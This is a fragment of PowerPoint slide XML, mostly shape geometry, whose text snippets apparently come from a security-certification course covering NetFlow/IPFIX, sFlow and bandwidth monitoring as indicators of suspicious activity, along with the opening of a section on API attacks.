                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341883" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616955" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5663354" y="2048183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5707853" y="2039093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5750046" y="2024441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5789525" y="2004633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825884" y="1980077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858716" y="1951180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887613" y="1918348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5912169" y="1881989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931977" y="1842510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5946629" y="1800317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5955719" y="1755818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5958839" y="1709419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5958839" y="341883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5955719" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5946629" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931977" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5912169" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887613" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858716" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825884" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5789525" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5750046" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5707853" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5663354" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616955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575929" y="4034408"/>
            <a:ext cx="5565140" cy="9455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lr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Records</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>statistics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SzPct val="110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solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Flows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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55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dirty="0" sz="20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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>endpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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0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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>ports</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>(keys)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SzPct val="110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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Netflows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>exporters</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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7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000" spc="-4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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>collectors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785859" y="3044951"/>
            <a:ext cx="5053965" cy="678180"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5053965" h="678179">
                <a:moveTo>
                  <a:pt x="4940554" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113030" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69008" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33083" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8874" y="69008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="113030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="565150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8874" y="609171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33083" y="645096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69008" y="669305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113030" y="678180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4940554" y="678180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4984575" y="669305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5020500" y="645096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5044709" y="609171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053584" y="565150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053584" y="113030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5044709" y="69008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5020500" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4984575" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4940554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0168890" y="3191382"/>
            <a:ext cx="228917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05" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Netflow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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80" b="1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2200" spc="-11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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>IPFIX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95144" y="6185915"/>
            <a:ext cx="5832475" cy="2051685"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5832475" h="2051684">
                <a:moveTo>
                  <a:pt x="5490463" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="341883" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1709407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="1755800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="1800296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="1842488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="1881968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="1918329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="1951164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="1980065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="2004624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="2024435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="2039091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="2048182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341883" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490463" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5536862" y="2048182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5581361" y="2039091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5623554" y="2024435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5663033" y="2004624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5699392" y="1980065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5732224" y="1951164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5761121" y="1918329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5785677" y="1881968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805485" y="1842488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820137" y="1800296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829227" y="1755800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5832348" y="1709407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5832348" y="341883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5829227" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5820137" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5805485" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5785677" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5761121" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5732224" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5699392" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5663033" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5623554" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5581361" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5536862" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5490463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097148" y="7034276"/>
            <a:ext cx="422783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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Uses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>sampling</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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12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0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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>estimate</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>statistics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683764" y="5740908"/>
            <a:ext cx="5055235" cy="678180"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5055234" h="678179">
                <a:moveTo>
                  <a:pt x="4942078" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113030" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69008" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33083" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8874" y="69008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="565149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8874" y="609171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33083" y="645096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69008" y="669305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113030" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4942078" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4986099" y="669305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5022024" y="645096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5046233" y="609171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5055108" y="565149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5055108" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5046233" y="69008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5022024" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4986099" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4942078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4804409" y="5885434"/>
            <a:ext cx="814069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65" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>sFlow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395716" y="6185915"/>
            <a:ext cx="5958840" cy="2051685"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5958840" h="2051684">
                <a:moveTo>
                  <a:pt x="5616955" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="341883" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1709407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="1755800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="1800296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="1842488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="1881968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="1918329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="1951164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="1980065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="2004624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="2024435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="2039091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="2048182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341883" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616955" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5663354" y="2048182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5707853" y="2039091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5750046" y="2024435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5789525" y="2004624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825884" y="1980065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858716" y="1951164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887613" y="1918329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5912169" y="1881968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931977" y="1842488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5946629" y="1800296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5955719" y="1755800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5958839" y="1709407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5958839" y="341883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5955719" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5946629" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5931977" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5912169" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5887613" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858716" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825884" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5789525" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5750046" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5707853" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5663354" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616955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8794242" y="7034276"/>
            <a:ext cx="516255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5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dirty="0" sz="20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dirty="0" sz="20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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>primary</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>indicator</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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11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0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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>suspicious</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>conduct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785859" y="5740908"/>
            <a:ext cx="5053965" cy="678180"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5053965" h="678179">
                <a:moveTo>
                  <a:pt x="4940554" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113030" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69008" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33083" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8874" y="69008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="565149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8874" y="609171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33083" y="645096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69008" y="669305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113030" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4940554" y="678179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4984575" y="669305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5020500" y="645096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5044709" y="609171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053584" y="565149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5053584" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5044709" y="69008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5020500" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4984575" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4940554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9941814" y="5886958"/>
            <a:ext cx="274447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14" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Bandwidth</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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135" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Monitor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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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993898" y="4258436"/>
            <a:ext cx="6209030" cy="835660"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="60960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2261870" marR="5080" indent="-2249805">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>4:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Operations</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-65">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Incident </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-760">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Response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66691" y="306451"/>
            <a:ext cx="772160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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Programming</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-2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14">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-5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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacks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0632" y="760476"/>
            <a:ext cx="10692384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496812" y="3906011"/>
            <a:ext cx="1473835" cy="1539240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1473834" h="1539239">
                <a:moveTo>
                  <a:pt x="1473708" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1425854" y="5308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378432" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331455" y="20002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1284947" y="29337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1238923" y="39992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1193393" y="51917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1148397" y="65112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1103960" y="79540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060069" y="95199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016787" y="112064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974102" y="130111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932040" y="149313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="890638" y="169659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="849896" y="191122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809853" y="213690"/>
                </a:lnTo>
